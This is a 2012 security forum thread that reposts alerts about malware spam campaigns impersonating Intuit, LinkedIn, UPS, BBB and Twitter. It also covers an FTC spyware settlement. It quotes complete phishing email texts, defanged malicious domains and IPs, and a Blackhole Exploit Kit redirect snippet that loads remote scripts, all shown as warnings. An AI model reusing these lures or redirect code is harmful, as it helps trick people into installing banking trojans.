If this is your first visit, be sure to
check out the FAQ by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

Fake Intuit email/Spam...
* http://blog.dynamoo.com/2012/09/intu...eloffceru.html
17 Sept 2012 22:41 - "This fake Intuit.com spam attempts to load malware from kerneloffce .ru:Date: Mon, 17 Sep 2012 08:54:50 -0600
From: "Mason Jordan" [LillieRoell@digitalnubia.com]
Subject: Your Intuit.com software order.
Attachments: Intuit_Order_A49436.htm
Dear customer: Thank you for ordering from Intuit Market. We are processing and will message you when your order ships. If you ordered multiple items, we may sned them in more than one delivery (at no extra cost to you) to ensure quicker delivery. If you have questions about your order please call 1-900-130-1601 ($4.79/min).
ORDER INFORMATION
Please download your complete order id #1197744 from the attachment.(Open with Internet Explorer)
2012 Intuit, Inc. All rights reserved. Intuit, the Intuit Logo, Quickbooks, Quicken and TurboTax, among others, are registered trademarks of Intuit Inc.
The malicious payload is at kerneloffce .ru:8080/forum/links/column.php which was hosted on 46.51.218.71 (Amazon, Ireland) until it got nuked..."
> http://google.com/safebrowsing/diagn...erneloffce.ru/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 1 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 4 domain(s)..."

Malicious UPS/FedEx emails re: iPhone 5 orders

FYI...

Malicious UPS/FedEx emails re: iPhone 5 orders ...
- http://community.websense.com/blogs/...-iphone-5.aspx
18 Sep 2012 - "The first batch of iPhone 5s will be delivered on Friday of this week... From reading discussion forums online... all orders from Apple's online store will ship with UPS... when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.
> http://community.websense.com/cfs-fi...ion_5F00_1.png
... the email contained an attached HTML page that, when loaded, displayed the page below:
> http://community.websense.com/cfs-fi...00_browser.png
... the risk is great that recipients will have their guards down and will run the attached file... There's a hidden, obfuscated script on the page... it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC... the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails."
___

LinkedIn SPAM - Blackhole Exploit Kit v2.0...

FYI...

LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/link...919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___

BBB malicious SPAM flood

FYI...

BBB malicious SPAM flood
- http://community.websense.com/blogs/...pam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-fi...D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-fi...2D00_550x0.png
... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2)<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___

- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."

Last edited by AplusWebMaster; 2012-09-25 at 05:50.

The machine has no brain.
......... Use your own.
Browser check for updateshere.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

Twitter DMs from "friends" lead to backdoor Trojan...

FYI...

Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012...video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.c...cked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.c...ed-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.c...ware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."

The machine has no brain.
......... Use your own.
Browser check for updateshere.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

Multiple malware IP's to be blocked ...

FYI...

Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil...817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."

BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-...housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz: Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.Blocking199.195.116.185 would probably be prudent..."

The machine has no brain.
......... Use your own.
Browser check for updateshere.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

FTC halts computer spying

Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leobowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/201...yware-scandal/

The machine has no brain.
......... Use your own.
Browser check for updateshere.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.